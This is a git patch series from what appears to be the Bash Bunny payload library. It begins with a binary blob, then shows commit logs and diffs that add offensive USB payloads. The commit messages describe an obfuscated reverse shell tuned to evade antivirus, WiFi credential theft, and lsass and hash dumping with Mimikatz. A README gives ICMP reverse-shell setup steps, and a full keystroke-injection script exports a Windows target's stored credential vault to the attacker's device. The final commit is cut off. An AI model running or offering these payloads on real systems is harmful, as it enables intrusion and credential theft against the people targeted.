z58-({$~NagHSs?>;_YvLC08AX6{`xjKhg-Yh%nH+G0NMQPctG;UFN7$m+bw6Xa}6U z&;(jKG&yUV^F4Ary7%iT$5Y{I&6`YgU>QHwrRQaA=6`e>T28Gp|AgaTDzY97h}Gk% znZ~w*k@oM)Zb|Vy$b6sBd>M*wCGn+>P_Y)!I`?Z{j1SjC-u+|ZO}vk#_E;tf7=Mtx z6neEQ6vh8rY||(8Ygbvs*u88CB+2go(){Xq#Mr%4_{kp) zTIe9gDB|9ux$~9wYrt*%>jz)_5wM`|+yv&tMVhljac%%7&91%Zq6q3oFfM`bQ9NnD zo^?J@71vn1eJnvyU;ZDY;l96^llDL1E^*zT)q)Y?|Eb0MAb$8~jsrvYB@n$4qH25Z z=`Q*OIB3O~gDv@#m0|_}l=iKcRcT(T-2Ne23w5WzK}Ka)jwC*>GuP=%9429L{Bok5 z(5`uzw_t+kS~eF%@8Oa8Dn|Y6eKfw|Se+)Cb@3N3)`ufGP@)b7aHNTRa%Jg|dvoGS zRIF=W6CB`)zXIv~Khl|rucH{6kzWKi)-kt&WAb1@d3oM%VQ8X&6wE&Z**FT?ze<(; zTEffH??BrWG0cx$>FcPt?s@l<{1}|tmHwx%s6(Os=xk(K;tVCoTyK)0}KDmky2XQS2%GV_%-sf3+5R3gf=k{{qY&J9moyAAukGYc=ZtSdISg67wIX zj6bkH?$Cd-7P>N}{~8jx9U^Q$orjJ5i9)D-Hk}#W{u1uve^sZ)Pb98D>Zir+C_jyk zp?^&^jX%;HZ?g_o&9cTu)L7C%e$z))Ux4DoEl`&l-)R3+)4ePc5A58Vab)AhBc+A2 zFQKOq@qccNzk?X_JHom$zfO(Fr@>(Cr?B?wf(ck6?w#1P`-E!moP9NEqj)Cd7;nmN zxk>q_eOLk|CZ0kZDBkEb2J4_k>1#1>C~9^N_p)xGK82TePCQ%CxX>ZS`EC7R=P z0AuZF0zju~=uP~JV$7$Zxf<#st_>P`3)xWJNzf-1R6Yk>ScJ7)My-Wq*go8#5xW$b z{|h|d)b0I>@_qVW0ifxgfg(sff)v(u>Gy*|HUmP6o7Q^ON+T*-aw2Iwb@mNJiuQpu z@ikJ`RZhRTQEP-#b!pk)gqn-%Org8MR|j2D2wje*Qu9Xn#i|y6g(Rk9ZQXjM@WKgN z3;qsgd#6!)Z~1emoRz)56RRlr=@Jo3rb*tUl6RQoek4)C z107#vvq|i(2k&j4f!$36NCFeL-o2 z&AUEI8c%()i%8K^;7PpvqAL5DFEYQX;uX5cn~C8uFx110H&C3rZfg8P2wm3MZZ|7+ z+-|UL7g%7@r2>zX_eXPFFw<&HM?FC(^G)m6Y3pnE9ZjR4cg^omVOO z9&VsyP?7oXVxg~ql*3;vdJ-{poqm~5K1{_m(mEwY=a?iOv&en z6nzh@iT@r|W&Z$Llus@&f?&Uv7`_FD%V5SIQQQ@@UMY`*SNP*IO3P#%U!t|v6KD6l zH#ZZRe=&x3GaP?^gKV690=`5ulGG-o@sC&g;LBT9;r*bS!_HpcF?| zelv05z|r*IFMfflG0&y#T z#vTjhe*R0;*4^_ShifM{Bjow=N8yIVwa|p4yIr`i!kAF~5S;>+zKQI+DEl<18!M-$ zU0vm~v^lqIBCF;n|DuaPp8$toogje(ducATZ_P(YhARV`Z0+=oX~r1`}cl;$fPn%~`M zH2)?`Y2HQ^xCR1=Uuo`h!HsyG4@MP#PvHiJoB>00v@eE)ewQK*cRlV)Yr4z75=AG) zgBo>ksLuZ1#l!caPQV*$3f`l2RpP+&u;!8XX2(u0eIEN_oFCT2|5h3Qi#vJZALs<% zv*LGcf7OpB^ut8e($)d^TO9ykhfeoLucIC~>VcykIO>6;9yscOqaHZwfukNc>Vg0F zJdkG1vg|V!EQ~IU+6%qb!stpn(7LNJ7-+Ji{$Ow}5Oq_&Fskmi6a}_T-nTpMgQ@#a zI2Khrb2Ia-tqV)e4q0b3`I-Z*K3iQ2qxDy1E^M;=jZxdz9u7o&O$+8)!H~Bx76`T4 z1bh9Btvdi)joVv8k(S1wz1`<;+!Y8#7FbcgFBqK4FHf*f|k zbFb7HeqyZH)94R{ioKzh^Q^gN_*$C+&2#5k(HP3}+EkH<-P9Osw6|=t%WW$h-Q8rh zM0b>00DY)SFlYr@gCVQk=k;2_Xe?yKqOnrT>)%;Qd`qoJu(91Dms&AjdyI0IQtnb~ z$s)U|waE@OEB#QvXvwO%7A*En>+ZSMnl;v%wKeYZH(E87nyMPCji{e{CO?KOk^2qM?!ccjn-7rObEumdL8_sUB!@fvMAR0xB zqU2C`54^w9a&L#yMsIAT zAc#OiT>HFaTK*!%Y7?uSmtT>Gc8~h4?eujO-QcqUpPl%`@G08v;LmT2?AT?+yuc|; zJ?;&aRqLzQpKs+YS(I03<)OuioDpdC2HTo^_PI^LW^Ze;|GcSaG}aUhY@Y^>z(q&E zZLI+a903ChgpNc5J6aoq40Ftfn*$U9!TOfQK$iRSr;lc&6f+?A;zTGSXCPyhGIGItBlDXDcX9U6I zrG7feqC>%E1|^x2BI73wM+>=H?epxC0{d#C*T!gy3Z@E7`9)PiyGM^1Ho9}Ffzhzk zy(2L%IwkHWTR6HWx`g};mkTtuC+v$(g?*7oE47)ElbdlWq{Cwh#vg8Uz!J(vq z=>lO`QPC>LOyWl49T{-oZ}f_`r$F4@7?6Qz#sf#(5N9~zjnObcMQy}P7lN%D8(W*U zhuUeFu5Jy)M6t0ZEE%STn~MECQ7=0GG#Mf9PM@$Q7-(&4UxK+F6TnmnofFlTOqbQz z*2Hz=l?$RfwA%#}sQ3bVt3_i9YNOUln93={{Zt3WgCWd;%x>UfZ3>!9-*8vZR@7sq z(Bx}{J6sq*lp0dyYY)U+r3k8PP0#Ur>)Y#T0h8ieTU}FSFKR~kk_3%7sGkqTpbHVw z+#GC+`d!W8f>q7lU?}QSw-zzBH13?#qsC}&OVgHfN>(hVNb!21WC!NY)?Kc=HEZ%H zwrQAK;Pn>RDl^aP&C`V}SyJiqhA<1!LM|BGqe@m95q3+rAk?6dtTEWxge@*DS$Ym< zwD?-Q;XN*5FVwvn3@DO>RHb~a6yxPK;7K$bXd>>$SX)$s0La6k$W9jvM;$I>K~zFl z9lka$zE+pi?1F~!avH`JK*iHlZ}=>g#FrMJRI2i;X<{dYt|Nycjq7h3ET|hgFZ>TjE2?ccq#UUwoQCH9r&|F}ji|H4`9?#lErO<#*x(TZ}8(RzT zZ^z`&9PkC3qI$q-wkxYvZ$7`Ou4)aJi)9nwz&QD_u&JZflKVAjMo73}JL^ zX^ieHv|Gq7>e_{NW1;OuN{OlY4}%8M*dF*$PYo}!QFI^@LQheXC?;F9PNq#0=b5x2 zfy)9{`9jSuN)$}y>C!ll5-N`-aMzjB=S9O}sERrj1o2tqxH# zH5|#G9cj`{#34~?FScFece}`Lgo0@s>gsFRyWvR4OYya3_2#u3t1qXvAtMoJq@J8q zkB|jHhRUJ)$#q9&CT&EwD6q&br8Uf1TT9L&W|WX=24iE!kuv}_xE{|i3WsrLhBVd4 zN;%dTr1$EQYg7HXKy}NjF$Xu>3pQmcuBl4x3hQgC*Ke+?-+0mH4Qs0E*Icx& z*1gFwUtIPSAFtl`+wvI#Kj$ub&1^n4*VX(@qnzSSEm>+1{9%P@XGLQhpRsA%6(S=#ZLI|IQWl~!nPtUiCuMe8>y zCeu;DpNYL%Bov{R-la86mASCGrbfx=QC+DN5u{@Xj0gC32-2|xEv$nf z2S~>hg*JUVKsvT4wCURc(lJJ%P2U<+W=l|+jrxI;zBQ+@keH2ybQGehwp8;_FC_0w z9q)+?5|p`s97|gZ&8Xu>6-Ngug*JV2ai%<~KcuxU>BOawjtFpArM!;bFlCZMn%9rc zm0L=l4r@?-d~+$PY*Y!=pl?QvSEi!IEkNNG!)xp$ag<}C9dU_qZiA1G956=e(T=LU zh?38Q4|6ZgsSQPfMmWQvbgasv$#NdiCaw zm#x02?xOWpCN;s9D;F=O@hNY6TXYYW`+4A=f=B%XaWl~vzKER8Ew_lm&)idh;htAj z0kpm964XVvx9w0TGCGj2EL7c!>?Cwo*rjn5657g*Rhu?fSJF6%?P(jvRW(RB24Kjx zVYPvM4=owgID$S&DpBYzEJ0AGb}XvN1kA|5lv~u6+y11Tx6;nD@xehrCS~Z6!$v%# zNPW&`I}amiC|6nQaYHPXdf2h;&C$jkJ{)aL9?UieBA67_5+5f`Xoo;JrcdlFIs!9? zSo)mQwJ=(+(vF6G-azvnn~ra{6t&|M+(xgy5I?ya$F;Dw8t1W}YQteG4q1q!7*T}- zJ(|9Wi3FzbuMeq%9;~deuRnrS9b%K+m%2C5snvo7b5XC2%3PG%Ow0HkSPQoLFcP9f zS14lp13UaUW{lzZw?HjOy={>Qmi_idwG>6ATd-5aks>tZwKTQ|TH0FF{7d@K2yHE3 zj*>Q7&|wwg4YdWE@ZEwn3Z|j}GPeg>8zXzrnW?+r0I-;pRbxGi^{*&SLDespJ3TQaTx)SG+P4@OZF<+GQU{7oB3AIJIS?s)p(L6ga$-|W{R?dfq z#KCwbnoBRwwk&MgR!~6xR!5pHbpVQ%Tpz-+QSUnGyUnLHP4YE^X`^cH02Yufp@>hp z6HfDjcPbwmFbZS6v?Rv5SVsxOQs>uLaU;~sR7TquXLKM3Lzi9=76&Q6&-wy0xi!P<+Eou(q zu)ZjY{tutw6r6U9+Mr^T=}3Vq*c42u!Qm^P57eK(elstr=vbiD=WBv01R@r0_J&P0 zmG$eZ>Nc4L52jU{4{I@ALtRQwZ4H)do{MTKt2WqM^NfqO(mVOQ`OUGBA&h1z{ozjA2H=*=zyrJZN4~>yOlpI!HzPELj2%hWDrujm*cv zr`pj|Pa!*5j(E`DqN#0+R)htO8VczERNIR_Vann&)X7;$4W5fj3l`A=89NcRi^6t; z${{%{BwYbDv)F-iq1U_04lG_=;5c2isXu{(Hxd*#1&d2b0bfcF=`x24p+a>A4YA2` zC?EB{sxfSbFj`Oz&=(M*)9b;E;ZjP@+KRezVjv1v8kx<=wr4QR<(ntoX+Nq9Pd2H;X60v; zXxfbU3#pa`g|thYv>x`8;q~?Cy66D0#z;(^;;TBi7E$2^_GJ7lT4btGP{=h%`J3#R zyhy7m)l_r_K8`N3O>3NiPwm=VSRDjnFi4#u|2zD628sB0u<-(R4D)$luF!?j4Y&Jmt2z@c8by?%2|jSgZ}4lRxr%)rmFld@-e zHt1{$M)$P1QX>(?)Dfj`#R;Eop_IN4EW2@gC=$b#)U+!5g?c3HXmTyZx?T@bsnZ6X z)ScY;h05Tu3 zg&l|qF8C%DFUFM|Dyf4YJ>Jv95ZdpPq9$x&=s>X0rsol>;7htNy>7&WgHxVjdkqfh zw)^b1=n?AxoVW2cdDNsz!1-e#RM10%a@#ev^hE{mpD72s1M}Pj%v)$oC?K2cg)}1L zh=4EEA=Gw8-N~mlsr66ohI%Z?>uc3%#Rj{iec6iTrOTU^m$Du+&AM^QzLt*fu;6RP zK#W-fR;hzSK1SDPTPV_B09k6q)wOHuFW9`U)}?ON)h<@F>S9GN#1X<}8|%+FgU{*< z?UF*f6a(W{RkD%axM|%cCBLC+Q%bIC4IQ4;1FCn|)Le8a3N*&xX#}0o<3NsadM z)p>}cycGYD_I?B6Mz)zzAZ*P$iz!54vjKD-jJ7Qwfa#$Uz60{)X8fjVS z6c+q#tqut;rx~YJt|Lp)?L|7V4Zx_j+h;e0TF;_s8^>cdhRa=a786jLbXET;@q(J} z;BZm5IMq{3_#$hId99-tOFFCymhjq%qYPVAwf2Dx8+C_pK4&XZgF{1m$5XCNRT~QJGj&zTLu%A6DxEBz zo-fi%G1Jt&nx8RF+DYZ&Nf<`D=1>^N(0NNR{4G%ri;BHiR^{!^L(MQR&~$905Ow~8 zXK|^Aa{2*~nubzO+|+KNeG8?rBqxF;Yo=MyHDi3mo^UJH(oRP9hLt)9q*Jy>|#|$Aq*tp|t_O zA0YVXp`v&(z|tk@?`hr1n8bn6I}!>L3Q|h)h(F_L=<1Qx(A@JwxZf9Otk2{XskZaN-syz(y`g3 zIsB*cHTmdS2cJhr z&^Tu0k-xMQhs30Y4vEigZ3_m^Q&D-O9BrG+vDK#;gYI?g;^Cn*Wg&v(3m{HV( znRx)NAE_1Uqk}~SXX-TV*s=dqQ&0+Ie;?s)sHWKj$Lpq5_4999RAHh(>*|}SUYdNU za;AFVAH-fRuY6&!4W~J1VEup{zTjp?98-Mbr6U|ZYlSolEB1x7Mme(uA3V$Fr|M`= z?R;L*AyZ4?IA86oIV>#d{5VEb;foKd*D!ZN@L{Nvox*hWmo^GqBtQ_~0sTW(R z^#{peL55{*9^Uc_d6z6~T7rcFt$Sb|gxP=ejuO`BsEuB1IpiWHSgGHrhw8+o4iKn7 zb97*MHD z%8VK+=4ttzT0e+S>7B~_!Ft=8Fk$|i_C}{Lf1utaZPAFf#Ub+n_1m%Y2<0EFpZs@( z(9Hfz*>i*piunM$b~gEXak5I1W1-8!|_oS4flhH(kiUW;mC(7`$s`+1C>8{1kh+Q|9K7qc z@iJAPOrt2Zq@8SJHE`=?Ef1_(9}K5amEP>bt$qQA&H(VBk}q}}JsJO?<&l2iPm4Fb zyT+t~Cp4%Q&#HO#m=o}RrIU|d$h41`hO1WM5fv8EIB27`!ZUhAe#FkNw|8Tg5iKS? zseL<)uS`@5MIBVpx%O^oipX*5qvTC6*3Y1W$K$LtYh)yt23%5nPx+z*ts9sXW3^J za;d2}<(=V~igAlpheeif&y;siIB-^}%Bb@w!dnfk>V-vh7=&X_^**%P@J*GYw^|%>w3CR0n%dL}1M;YcPm1dLQ#_e>X;js; zwVUwL0+M(Ggx+oN1)EdjkW+x(oN<=dg7dmV2a0-r9EIpH7 ziFbRbmTo-owOiX-w)@l)*BipS8Q4jo(t1;?+S6ICax5O%Zd2mx=-DNXc<}EHkZ)6O zYmhLzm7ejSEY%R|)D0)+7^l!X>9K62agQm92A64`uF@NIRA_2Ea=aUa_eBC`6Q#E^ zh?yg|QS?(t{R=p=<)T5wJW$TeG;jD|Rj1E56;NPa_DQ`S#QP+?C^WePz~2zUtJ8Q7 zg?60y8JvDq1cUf4^o)o-{m%+j`%^zIqTj&Tb`||(QqS=;Y$15;rlut=Elc*`qJwNq zPWF~oyp)5#(Wm5El-xQj@9`=Tb;PDX6t7_HvD?CEJM|Mxt#3=-2iccr^ffDeYw48{ z)lCrT^rj5QA@tMxHpqqLs{DZBuhxOh;YLdaC8U1MiRSc0!iY6^AyDjFiMpz4YkB&8 zA>O{L!$A_i$$|FMj|L#vZ0f88)oWl=ewa7uzo61nLqV@!j$&JMiABVy?2XVjUQ@v! zOb6C&kw6TO)7Igq5_lYeH$?DIBNEu&re7wy=7A23GkEf=j_3-7ahrI1(W6KbSVq7HV8 zIEywber3P5)^@CPC{(s-K9Az_nBSowaPj(Lq%q|KbM#3)UP)36$E zeroqly(C7nBX>vjm?Kr*YW;#8YrzpO-mt=R=xF0El%{_E(P$U9Q*5DqDVDbHp=CV1 zWvz6WaxV+DA)fJuBfq@p`0chHcTgv-ZwsD$;1GfaqisB&u_p4n)Z-ZN)Bw7r2vX36 zL8X}nAiQ9T^Iz^MWIYTbJ$RW7&(dl9L~ZozgFZZb;lY&V)4VN3E!*(EA5Ks3`U9Cj za;AJ96`>zZK)S3J5nLSw2P!qCrv9e$KBQ<`*GEAPN z+>hN9ZlDmAH35spZf*=4WCeKBiH`(s>m(hEz8{F$RUA9UEA)?bpt7?6L zmT-_>zl6sl_<<9al+D@$q-R|fp43Coy}G)ldedd7kiE8g)B3878|}3hZLr;Tt$V|! z>NT5d+#BrL%^PYj+E`VL7iZxxn97bMJs;qGno88GpY$*z5R4wtucChSU>1KtAFh9nbouZ8`ZCqRELhy5W^vdqvd8A-wW;Cm^f8`IikfavcF=zuMNBD zKx?60>2KVLQ_R(Pw=>v?0~J44Q}N+_QA`tN=Z&!o{oqq=czTVog9f&h{#Y!$a>;OD4aH&yC+sCimgv^hujYJM-jyGxJ{he;^}u zQ2N*3N+ut~hwgua&p}5U-H-b|PIo)-eU5vQyPDHGL8lEI2F*cL>Q@i=!zQ#k) z1gq3inlOB=YGS1$2|Z)+LIm3x^CtN8r5OFGKMgRwehg`P!KfZuE>TaVsnh9MN@Y!7 zlF_e@#ONG+di`v_J}Ocp=7(z5^)dQWzn7d||KtjGSD4qZ+Fm2Cf3JauB-1#Tmdm_` z#?LrtS%Rk<7%(u7@s?!zx|4;QX-kCPNBF&%TJg3HW{+*SYq1-fnj&-;umhN0=&s%N zwzM|UT@Y_XYb->+;h@JK1W*1ElWlmToXZx?ss`2C8v7Ex#Inzp`81o-(W2TGZPYt^ zUcu75XXMT)E-60SnjGD3y@jr^Pil4JOv4qHRWX!I{=u#BVoJYH>9mt)uX+IBe0*G; zh;jT~*3Qo*lP=I+&^hUrH3B+}{6k&IWCiey8!`PZX z2kCF%-!25r#W>)C9qpiDP`Xak#7etrgO%2vlXmj)$7b}T9h*b=DU=7B7c&o$>G>@S zf6i6$+n-G)8(@=_m9sW0_k!%>c4u^0pZxf$MQ7*d8Tm@w)Wws@3_4Z?&2qW3?A2MhU|OA(vF5m04+C1`fGUrJ3j9TCs|4-1wFiIG z7IbEvvwi^iN{77rxXP@unyiX#S!I=3C2mom`#4qS8=y1ii^=3hsJ7gxI$w}w$Fg#f zhJ#dlJpeur_?8l1Wmb+K__?_KZ{T6zuMn>4iz;=`uA=%@QhnD@eP``D!Zxsb@Hrms zY$HZb;<|ld7UVxadu^88J!fr}>jv`IXO3}amF+#YGOKphi*vKefWVXRXv%r#AE$KH zLDxT^>%UUEs#3bDNEh7jnPcFTy~kdd)i67prX4d?7i=oS=Wgh#Lmw%}y{;E@IqS8S z>a`)u1y7~y04v4cC}g)nb|Fn8@Cnxm7I)8CO?F(Es?+&d=C1b31hR^(B+9(LXFSX?r!Jf zcnI2%f~o*j1Df?i!$b%%&HC%K4Y~F>8^zk_J2&i4Ce=8sViJ95@9gulC=*vDeZZ5r zCz(_SFv?E&;PVuBY^Q2#54H9ASru1K7d7-R-&i+5kM&>4B!$e;>!=5gdf=!Bj(Xsz z2abB+s0WUE;HU@w9S;n6HCLGFIrs-y=<2^w)7*YdALMiyr^8J9nNBeMG4s`bL(5fs zQ`1hS2RQ#XOvjlXdz0onjp;c|jh+FPA7y%>$j`Y~%a<^1VA{ldR}21L&hKV?kkkE~ z9_6(4Ev?tZ^l{FAk?Gq^XMI`oox=2NrpEqSmhWLY%vAE_d|T_OW!lcPkLfT|>psm_ z#?)`pqTD{l4>8UCj+Qfar|e^VEz4gn^mK6kAk$H%x!;{$-<3kXjQM1JpZc1X-^=_a z{%#fNdpP}Lf&Yrre`fkN(|I>*y$hJ0&D7{WU!;54K9j$N^RHlfDbpy^=h^Q4oPL?< z9ZXk$MVG&a`J~=qF3;$_U+A?4wEVM-zr^$~Q;YSNF<%a+3z@o^Zf5Fb+RpaOWY?#d z&)C(#`b~YMUDq@JD{NO6r*CEY1ExVqU%x^!a`RkZU{T+<2W%(^kLrgn`-T~&noAHO3{zCA*$mzce zJi+qD{w(&hN$37h+gr=Dlj-Tqw@mPVlGB@+hM4YU`gNuQtmh$4k8pZ|=?LS8naXnB zXFPXM+h^>pqlDN#k7L?OdMV;^w%=qio2$kTfk}4&T<|z z^T{}uQjIo->8hL|Rp<~*eBEMwZhw3F!o(-EfD!*sV9w~O&tALkEo{tHZp8BcK9@IQAumnYUEX(BD>*9q45G3G1# zsn+9XTFUq;rag>b!0BO5Z{_rErdKmH_R03^m0NGFzcPnK3%?9_n7sJS-%)PxsPhTI;K5L2bqpAJ%#m|_%!n7A6GQ}=S=2X&eZU& z<@6Oy{Y+g4EOlMY=~_;rs`fKF#zwrU|Ad-jbZo`nsjA zT&4?{x*pT`Vosa59AUZTjGOjzbK2CqmgS9qF5`T^(Z}?&Ce8ePOpTtea=sa7zR&3= zn7+VtoaJ8Uv~{Ppe?HSiOh3tV6Vm|G>zLY)Yq=XaeJ9f&GJTwB9rOJUr_FdY%IQ~_ z_AuY9yR_bqGBxAMAm_UnALaCNPMh}Mz-d3z>zLleG~=Mwe=nyiINibYea7eAt@-*H zA7=Ux=Re2vWv1^jJ)Y%0&eX)$Cpc~5%EZZ9#@935$~4B*#Q6l5Z|eD3&M$dF+j%Re z{haP+dJp3xoX$C<`M=M2EvGw~n)&82&Nt=#fzxxio+h46{0*|aiQ|7Te^Tf%`bU}H z=r`>=?;F}agPU>fWPvZ`wDqLsU(e|hPS-N^GQNYUv0F<`ew%vqv)m}tlBYCJ1JgdH z38oR&oAb2ht7RHyI>2<4X~utRz6z$DOb3{bFr8p(?6QBZ<+{1N3Qqf(_AoX4gCeb^ zXZ{X-N#_~)QI@x#nTpqPx>w+%oObs zV>-yx@Qri2?3bFaovF$16KP{#8sA*NH^-Zd27NP+)3JT}=3|^5cuU`$%;^lKA7?tq z`KO5df4-j#5tK1oXQXp}_*i{&45!ODe=etg%k~||>0GAsnHs`kR%ezLn8g|GoN*$j zxj5@2P7kcpHwMq;f=#`8*XaCA<~QY^#%aTcf8<-$52Y&zFM+9aKMN)&^OfW{r!U}q z{FBm(|0!cQ>;Hd>^d8TS6bhF&XkabVOPDq@-Np1XOmAj-57P&k9%T9)(?2tPlj$*y zmb(6f>6uKIGhNH{5~j^ecQO48)0>&z!}LL>2bn&{^v_J+WO~eYE}!X{OqVlV%k&ba z%}jSO)zbg>zcX^ul(7Du)Khe$zF*388PhVR7cgDN)b#6GPVb)~-^+O9L-KcjNd7e+ zlHc(m`TIU3zw<-#ZxH#$Kc;>c-=_U%{3G-47V*s_H}kilX8tzi%lgMyel;sJ>j6W} z`hnzW%^>Bk14cd}`_$Dim6~-1qsmruPjnAHPIODug&EfPuP^Wyy zcAa6Uv6tCX_8Yug$oH_kp)W2llA4-w4NAkOvwX8&G}Nq{48M&3TUb6-%^v1tI&r>{ z)YP7uw7!lsm2c!Heyte{<;NT;DOvt^h5W#XW;JwJ2pGQ^g+Ibg7CzL6=rZf$fxqaq zy5~ zC*`gw>9CRYjS-x3+cfPO0EI-TZ)MWoLddN(tyv6GzjpDsvA#WQ+OkV{hUB-Uv qqgo)5rs>Fs$iD$u!J;%9c^aRcmk5WcwmTS4nWeR|8L1pu*8c?xM@xeM literal 0 HcmV?d00001 From 1eef8dc006d2d8fe0a03b08efba3e219378c5c2d Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Sun, 17 Apr 2022 21:47:41 +0200 Subject: [PATCH 3/5] Updated README.md (#513) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Uploaded ReverseBunny Obfuscated reverse shell via powershell * Uploaded WifiSnatch Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away 🐇 * Update ReverseBunny.txt Changed payload to evade Windows Defender * Update payload.txt Added new "Eject Method" - props to Night(9o3) * Update README.md * Deleted ReverseBunny.txt Deleted because of higher risk to get caught by AV * Updated ReverseBunny to version 1.2 Updated ReverseBunny to version 1.2. - Deleted payload on disk because of AV - Added custom shell design * Updated ReverseBunny to version 1.2 Updated README for ReverseBunny update * Updated payload fixed some stupid left overs <3 * Uploaded pingUinBunny a reverse shell using icmp * Delete payloads/library/remote_access/switch1 directory * Uploaded pingUinBunny A reverse shell using icmp * Update README.md * Update README.md * Updated to PingZhell * Update Bunny.pl * Update README.md * Update README.md * Update payload.txt * Rename payloads/library/remote_access/pingUinBunny/Bunny.pl to payloads/library/remote_access/PingZhellBunny/Bunny.pl * Rename payloads/library/remote_access/pingUinBunny/PingZhell.ps1 to payloads/library/remote_access/PingZhellBunny/PingZhell.ps1 * Rename payloads/library/remote_access/pingUinBunny/README.md to payloads/library/remote_access/PingZhellBunny/README.md * Rename payloads/library/remote_access/pingUinBunny/payload.txt to payloads/library/remote_access/PingZhellBunny/payload.txt * Update payload.txt * Update README.md * Update README.md * Update Bunny.pl * Created ProcDumpBunny Dump lsass.exe with a renamed version of procdump and get the users hashes with Mimikatz * Update README.md * Update payload.txt * Updated ReverseBunny Fixed wrong DELAY commands * Updated PingZhellBunny Fixed wrong DELAY commands * Updated WifiSnatch Fixed multiple mistakes * Uploaded HashDumpBunny Use your BashBunny to dump the user hashes of your target - similar to the msf post-module. The script was obfuscated with multiple layers, so don't be confused. If you don't trust this script, run it within a save testing space - which should be best practice anyways ;) * added example picture * Update README.md * Uploaded SessionBunny Utilize SessionGopher (Slightly modified) to find PuTTY, WinSCP, and Remote Desktop saved sessions. It decrypts saved passwords for WinSCP. Extracts FileZilla, SuperPuTTY's saved session information in the sitemanager.xml file and decodes saved passwords. Afterwards decide which is important and what you want to save onto your BashBunny. * Uploaded SessionBunny Utilize the famous, here slightly modified SessionGopher script, to find PuTTY, WinSCP, and Remote Desktop saved sessions. It decrypts saved passwords for WinSCP. Extracts FileZilla, SuperPuTTY's saved session information in the sitemanager.xml file and decodes saved passwords. Decide which inforamtion you wanna take with you - save it onto your BashBunny! * Update README.md * Delete SessionBunny directory * Uploaded MiniDumpBunny Dump lsass with this rewritten and for BashBunny adapted version of Powersploits Out-MiniDump. * Update README.md added disclaimer * Update README.md * Update README.md * Update README.md --- .../library/remote_access/PingZhellBunny/README.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/payloads/library/remote_access/PingZhellBunny/README.md b/payloads/library/remote_access/PingZhellBunny/README.md index fe1bcb23..ac8ccd9f 100644 --- a/payloads/library/remote_access/PingZhellBunny/README.md +++ b/payloads/library/remote_access/PingZhellBunny/README.md @@ -24,18 +24,18 @@ Install dependencies, if needed: - NetPacket::ICMP Disable ICMP replies by the OS: - *sysctl -w net.ipv4.icmp_echo_ignore_all=1* + `sysctl -w net.ipv4.icmp_echo_ignore_all=1` Start Bunny.pl -> perl Bunny.pl # !!!Insert the IP of your attacking machine into PingZhell.ps1!!! # -Plug in Bashbunny with PingZhellBunny equipped. -Achieve reverse shell. -run away <3 +

Plug in Bashbunny with PingZhellBunny equipped.
+Achieve reverse shell.
+ run away <3

Credit for code and ideas: - bdamele -- nishang +- samratashok - krabelize From 3f4149415334c07acfbef12f457cf04d6eef1907 Mon Sep 17 00:00:00 2001 From: cribb-it <24548670+cribb-it@users.noreply.github.com> Date: Wed, 20 Apr 2022 20:04:44 +0100 Subject: [PATCH 4/5] New Payload - KeyManger Backup (#517) * New Payload - KeyManger Backup * Update Desc --- .../Win_HID_BackupKeyManager/payload.txt | 66 +++++++++++++++++++ .../Win_HID_BackupKeyManager/readme.md | 30 +++++++++ 2 files changed, 96 insertions(+) create mode 100644 payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt create mode 100644 payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md diff --git a/payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt b/payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt new file mode 100644 index 00000000..48b0284a --- /dev/null +++ b/payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt @@ -0,0 +1,66 @@ +#!/bin/bash +# Title: KeyManager Backup +# Description: Create a backup of the key manager which stores log-on credentials for servers, websites and programs +# Author: Cribbit +# Version: 1.0 +# Category: Exfiltration +# Target on: Windows 10 +# Attackmodes: HID & STORAGE +# Extensions: Run +# Props: Paranoid Ninja + +####################### Config ####################### +password=lamepassword +##################### End Config ##################### + +LED SETUP + +ATTACKMODE HID STORAGE + +LED ATTACK + +QUACK DELAY 200 +RUN WIN "rundll32 keymgr.dll, KRShowKeyMgr" +QUACK DELAY 200 +# button: Backup up... +QUACK ALT b +QUACK DELAY 200 +# button: Browse... +QUACK ALT b +# file name +QUACK STRING "backup" +# select task bar +QUACK ALT d +QUACK DELAY 200 +# look for bunny +QUACK STRING "BashBunny" +QUACK DELAY 600 +#select drive +QUACK DOWNARROW +# add loot folder +QUACK STRING "/loot" +QUACK ENTER +QUACK DELAY 200 +# button: Save +QUACK ALT s +QUACK DELAY 200 +# button: Next +QUACK ALT n +QUACK DELAY 200 +# note: keycroc you can uses CTRL-ALT-DELETE +QUACK CTRL-ALT DELETE +QUACK DELAY 200 +QUACK STRING "$password" +QUACK TAB +QUACK STRING "$password" +# button: Next +QUACK ALT n +QUACK DELAY 300 +# button: Finish +QUACK ALT f +QUACK DELAY 200 +# button: Close +QUACK ALT c + +LED FINISH + diff --git a/payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md b/payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md new file mode 100644 index 00000000..89c5fdbd --- /dev/null +++ b/payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md @@ -0,0 +1,30 @@ +# KeyManager Backup +- Author: Cribbit +- Version: 1.0 +- Tested on: Windows 10 +- Category: Exfiltration +- Attackmode: HID & STORAGE +- Extensions: Run +- Props: Paranoid Ninja https://twitter.com/NinjaParanoid/status/1516442028963659777 + +## Description +Create a backup of the key manager which stores log-on credentials for servers, websites and programs. + +## Change Log +| Version | Changes | +| ------- | --------------- | +| 1.0 | Initial release | + +## Config +set the password for the backup by setting the `password` variable + +## Notes +This payload relays heavily on button shortcuts this mean it is very target to an English version of windows. +If you are targeting a different language, you will need to change the letter after the ALT key to the corresponding letter for the button. + +## Colours +| Status | Colour | Description | +| -------- | ----------------------------- | --------------------------- | +| SETUP | Magenta solid | Setting attack mode | +| ATTACK | Yellow single blink | Injecting script | +| FINISHED | Green blink followed by SOLID | Injection finished | \ No newline at end of file From f12c486e122e1fb37340538a7909269b152d8ff6 Mon Sep 17 00:00:00 2001 From: KarrotKak3 <104325530+KarrotKak3@users.noreply.github.com> Date: Fri, 29 Apr 2022 19:05:40 -0400 Subject: [PATCH 5/5] Add files via upload (#518) New Payload. FireSnatcher --- .../credentials/FireSnatcher/FireSnatcher.bat | 6 ++ .../credentials/FireSnatcher/README.md | 45 +++++++++++ 